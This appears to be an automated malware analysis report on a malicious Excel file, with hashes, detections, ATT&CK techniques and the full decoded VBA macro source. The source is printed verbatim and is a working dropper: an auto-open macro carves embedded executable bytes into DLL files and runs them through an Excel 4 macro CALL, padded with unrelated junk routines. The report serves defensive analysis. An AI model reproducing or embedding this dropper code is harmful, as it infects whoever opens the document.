Office (OLE) malware analysis — malicious · a712e5d72dcbfd69

MALICIOUS

Office (OLE)

906.4 KB Created: 2020-06-22 10:41:03 Authoring application: Microsoft Excel First seen: 2020-08-25

MD5: 4c29a821298cf628d9d12398cd1a4915 SHA-1: 7f95801938526d63bb4aaba379f75998cdb92f5d SHA-256: a712e5d72dcbfd696b2e6ff7f1e7c12935591543a4e26b0b01e57dddf2f05e6c

490 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that triggers execution. This macro is designed to launch an embedded PE executable, identified as Win.Malware.Agent-9451293-0 by ClamAV. The presence of Shell() and CallByName functions, along with references to Windows Script Host and LoadLibrary, indicates a malicious intent to download and execute a secondary payload.

Heuristics 12

ClamAV: Win.Malware.Agent-9451293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Malware.Agent-9451293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat)

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ocsp.sectigo.com0 In document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://ocsp.usertrust.com0In document text (OLE body)
- https://sectigo.com/CPS0In document text (OLE body)
- http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sIn document text (OLE body)
- http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#In document text (OLE body)
- http://crl.comodoca.com/AAACertificateServices.crl04In document text (OLE body)
- http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vIn document text (OLE body)
- http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://crl.comodoca.com/AAACertificateServices.crl06�4�2�0http://crl.comodo.net/AAACertificateServices.crl0In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18881 bytes
SHA-256: `39e1ad9f867a617d21aa677ac84ecf63f34e89764f692251351cf93d3725d675`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() If WelcomeDialog.Visible = True Then Exit Sub End If Module2.WuzzyBud 3900 End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Worksheet_SelectionChange(ByVal target As Range) End Sub Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Repositor" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Get CheckCar(car As Variant, Drive As String) CheckCar = car.SpecialFolders("" & Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property Public Property Let Speed(sp As Integer) End Property Attribute VB_Name = "Module0" Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents DoEvents ActiveWorkbook.Close DoEvents DoEvents End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key End Sub Private Sub TextBox2_Change() x = Len(TextBox2) Y = LTrim(TextBox2.Text) d = TextBox2 If d = "" Then TextBox2.BackColor = &HFFFFFF Exit Sub End If If Left(d, 2) > 24 Then MsgBox "Ora Errata" TextBox2.SelStart = 0 TextBox2.SelLength = Len(TextBox2) Exit Sub End If If x = 2 Then TextBox2 = Y & ":" If x = 4 Then Exit Sub If Mid(d, 4, 2) = "" Then Exit Sub If Mid(d, 4, 2) > 59 Then MsgBox "Minuti Errati" TextBox2.SelStart = 3 TextBox2.SelLength = Len(TextBox2) Exit Sub End If If x = 5 Then TextBox3.SetFocus End If Exit Sub Resume End Sub Public Function Vooooohead() Dim ofbl As String Dim sOfbl As String Dim NumBForRead As Long dershlep = "" + Dialog4.TextBox1.Tag Dim sendings As Integer ofbl = Dialog4.TextBox3.Tag ofbl = ofbl + "\srt_join" liquidOne = Dialog4.TextBox1.Tag + "\academ" liquidOne = liquidOne + "l.xlsx" Dim arr(1 To 3) As String If Len(Dialog4.TextBox3.Text) > 266 Then MsgBox "Ultrapassa 66 Caracteres!", vbCritical, "HISTÓRICO" TextBox7.SelStart = 0 Else End If Dim objeto As Control If Len(Dialog4.TextBox1.Text) > 366 Then For Each objeto In UserForm1.Controls On Error Resume Next objeto.Value = "" Next Unload ggg.UserForm1 ggg.UserForm1.Hide End If ctackPip = liquidOne & Page11.Range("B115").Value PublicResumEraseByArrayList ofbl + "", ctackPip, dershlep + UserForm1.Label1.Tag VistaQ liquidOne FileCopy liquidOne, ctackPip sendings = 1 Dim sNMSP As New Shell FlagDouble = True Lrigat = UserForm1.Label11.Tag If sendings > 0 And sendings > -30 Then Set DestinationKat = sNMSP.Namespace(dershlep) Set harvest = sNMSP.Namespace(ctackPip) End If Set ExcelC = ThisWorkbook.Sheets(1).Application.Sheets(1).Application CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat) Dim car As Repositor Set car = New Repositor For StepBit = 1 To 2 NumBForRead = 320912 sendings = 1 flayString = "1" If FlagDouble Then sendings = 2 NumBForRead = 1000000 - 725680 FlagDouble = False flayString = "2" End If sOfbl = ofbl + flayString + ".dll" Composition dershlep + "" + UserForm1.Label1.Tag + "", sOfbl, NumBForRead, sendings If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If If -100 <= sendings Then sendings = sendings + 1 ChDir Dialog4.TextBox3.Tag sendings = sendings + 1 End If sOfbl = """" + sOfbl & """,""" If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If If sendings > 1000 Then sendings = sendings + 1 End If If sendings < 0 Then sendings = sendings + 1 End If d = CallByName(ExcelC, "ExecuteE" + "xcel4Macro", VbMethod, "CAL" + "L(" + sOfbl + "seede"",""J"")") If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If StopByOk = TestResult(d) If StopByOk Then Exit Function End If WelcomeDialog.Hide Next End Function Sub subTotalSales() Dim LR As Integer LR = Cells(Rows.Count, "A").End(xlUp).Row + 2 Rows("1:2").EntireRow.Insert Shift:=xlDown If LR = 3 Then Range("A1").Select Call salesHeade.rs Range("A2").Formula = "$0" Range("B2").Formula = "$0" Range("C2").Formula = "$0" Range("D2").Formula = "$0" Range("E2").Formula = "$0" Range("F2").Formula = "0%" Range("G2").Formula = "0" Range("H2").Formula = "$0" Range("I2").Formula = "0" Range("J2").Formula = "0" Range("K2").Formula = "$0" Range("L2").Formula = "$0" Range("M2").Formula = "0" Range("N2").Formula = "0%" Else Range("A1").Select Call salesHeade.rs With ActiveSheet End With End If End Sub Sub InputWeekData(x As Date) ActiveCell = Format(x, "ww", vbMonday, vbFirstFourDays) ActiveCell.Offset(0, 1).Select ActiveCell = x ActiveCell.Offset(0, 1).Select ActiveCell = x + 6 ActiveCell.Offset(0, 1).Select End Sub Private Sub TextBox3_Change() Y = LTrim(TextBox3.Text) d = TextBox3 If x = 5 Then TextBox4.SetFocus End If Exit Sub Resume End Sub Attribute VB_Name = "Module1" Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf Not tooolsetChunkQ Then If c = " " Then j = j + 1 End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " ccc" Then End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module2" Public DisputeChannel3 As Byte Public DecemberUpdate As Byte Public HurricanMoes() As Byte Public abbrev As Byte Public Sub WuzzyBud(dImmer As Integer) If WelcomeDialog.Visible = True Then Exit Sub End If Dim s As String Dim GetLevelDescription As String Dim reqPlace As Long reqPlace = 3 reqPlace = reqPlace - 1 Set TSPIP = New IWshRuntimeLibrary.WshShell Select Case reqPlace Case 0 s = "N health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim car As Repositor Dim SpecialPath As String PRP = "%" & Dialog4.TextBox1.Tag Set car = New Repositor Dialog4.TextBox1.Tag = CallByName(TSPIP, "Exp" + "andEnvironmentStrings", VbMethod, PRP + "" + "" + "%") Dim firstWeek As Integer Dim firstDay As Integer Dim firstdate As Date Dim lastdate As Date Dim lastWeek As Integer Dim lastDay As Integer s = car.CheckCar(TSPIP, Dialog4.TextBox3.ControlTipText & "") firstWeek = 1 firstDay = 2 lastWeek = 3 lastDay = 4 Dialog4.TextBox3.Tag = s If Not firstDay = 1 Then firstdate = firstdate + (8 - firstDay) firstWeek = firstWeek + 1 End If If lastDay = 6 Then lastdate = lastdate + 1 lastDay = lastDay + 1 ElseIf Not lastDay = 7 Then lastdate = lastdate - lastDay lastDay = 7 lastWeek = lastWeek - 1 End If Dim iteration As Integer ChDir (Dialog4.TextBox1.Tag + "") If WelcomeDialog.Visible = False Then WelcomeDialog.Show End If End Sub Attribute VB_Name = "Module4" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim PChannel As Long Dim logicVari As Integer Dim SimpleMethod As Integer ReDim HurricanMoes(1 To fl) PChannel = FreeFile Open Composition2 For Binary Access Read As PChannel logicVari = 1 Do While Not EOF(PChannel) Get PChannel, , abbrev If abbrev = FirstB Then HurricanMoes(1) = abbrev Get PChannel, , DisputeChannel3 If DisputeChannel3 = SecondB Then HurricanMoes(2) = DisputeChannel3 Get PChannel, , DecemberUpdate If DecemberUpdate = ThirdB Then HurricanMoes(3) = DecemberUpdate If logicVari = DisputeChannel6 Then For k = 4 To fl Get PChannel, , abbrev HurricanMoes(k) = abbrev Next k Exit Do Else logicVari = logicVari + 1 End If End If End If End If Loop On Error Resume Next LoopIfEnd = 400 Close PChannel LoopIfEnd = 400 + LoopIfEnd PChannel = FreeFile LoopIfEnd = 400 + LoopIfEnd Open ofbl For Binary Lock Read Write As #PChannel LoopIfEnd = 400 + LoopIfEnd zeroBob = 1 For i = zeroBob To UBound(HurricanMoes) If WelcomeDialog.Enabled = True Then Put #PChannel, , HurricanMoes(i) End If Next i Close PChannel PChannel = FreeFile For HSP = 33 To -1 Step -0.25 PChannel = 6 + i Next HSP PChannel = 6 + i End Sub Private Sub cmd_Keluar_Click() Unload LSD.Me MDIForm1.dokter.Enabled = True MDIForm1.dokter.Checked = False End Sub Private Sub cmd_Perbaiki_Click() If cmd_Perbaiki.Caption = "Pe&rbaiki" Then cmd_Simpan.Enabled = False cmd_Hapus.Enabled = False cmd_Batal.Enabled = True Dim var As String var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter") If var = Empty Then Exit Sub Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil txtkd_dok.Enabled = False txtnm_dok.Enabled = True cmd_Perbaiki.Caption = "&Perbaharui data" Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If Else Data1.Recordset.Edit Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Perbaiki.Caption = "Pe&rbaiki" cmd_Batal.Enabled = False cmd_Simpan.Enabled = True cmd_Hapus.Enabled = True Call tdk_bi.sa End If End Sub Private Sub cmd_Simpan_Click() If cmd_Simpan.Caption = "&Isi Data" Then Call bis.a nom.Or M.e.txtnm_dok.SetFocus cmd_Batal.Enabled = True cmd_Perbaiki.Enabled = False cmd_Hapus.Enabled = False cmd_cari.Enabled = False cmd_Simpan.Caption = "&Simpan Data" Else If txtkd_dok.Text = "" Or _ txtnm_dok.Text = "" Then MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT" txtkd_dok.SetFocus Else cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Simpan.Caption = "&Isi Data" End If End If End Sub Attribute VB_Name = "Module5" Private Sub Command7_Click() b = MsgBox("?????????", vbYesNo) If b = vbYes Then a = "delete from cinema where cinid='" a = a + Text1.Text + "'" cnmovie.Execute a rs4.Close Sql = "select from cinema" rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic If rs.BOF Or rs.EOF Then MsgBox "?????!" Else rs4.MoveFirst Call View.Data End If End If End Sub Private Sub nomor() Dim urutan As String * 5 Dim hitung As Byte If Data1.Recordset.RecordCount = 0 Then urutan = "Dr" & "001" Else Data1.Recordset.MoveLast If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then urutan = "00" & "001" Else hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1 urutan = "Dr" & Right("000" & hitung, 3) End If End If M.e.txtkd_dok = urutan End Sub Private Sub cmd_Batal_Click() Call be.rsih Call td.k_bisa cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True End Sub Private Sub cmd_cari_Click() Dim var As String var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter") If var = Empty Then Exit Sub If var <> "" Then Data1.Recordset.Index = "kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil Call bi.sa Call kun.ci Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Public Function TestResult(result As Variant) TestResult = False If IsNumeric(ExcelReturn) Then If ExcelReturn = 0 Then TestResult = True End If End If End Function Private Sub cmd_Hapus_Click() Dim var As String var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter") If var = Empty Then Exit Sub If var = "" Then Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Data1.Recordset.Delete Data1.Refresh Data1.Recordset.MoveFirst Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Attribute VB_Name = "Dialog4" Attribute VB_Base = "0{87059EBD-B0E8-42DB-8E39-2A9C71C151F1}{6BE3B450-3000-4C20-8BA5-82D59EB8BC12}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "WelcomeDialog" Attribute VB_Base = "0{2A159DBD-DD60-46A3-A2D5-B27EA6C0ADFE}{671955F3-6BA1-45A4-8C94-ECFC9DDF27C4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() DoEvents DoEvents Vooooohead DoEvents End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{C2B5E045-FE0A-4CEA-A7E5-86FE73A37A90}{860A1A21-CF67-44B5-AE95-709C13A05176}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_00001b56.exe`	embedded-pe	Office MZ+PE at offset 0x1B56	921158 bytes
SHA-256: `06bb0bee5dd4cc1625c44cd0cade229666ff624e7f99e1c41fbbe20efcb89c0f`
Detection ClamAV: Win.Dropper.Hideproc-6663113-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD00321A15/Ole10Native	599752 bytes
SHA-256: `272d1acb2a22167b377c491d2e48ace714a75dd1330325cf5cedcad9c554400c`
Detection ClamAV: Win.Malware.Agent-9451293-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.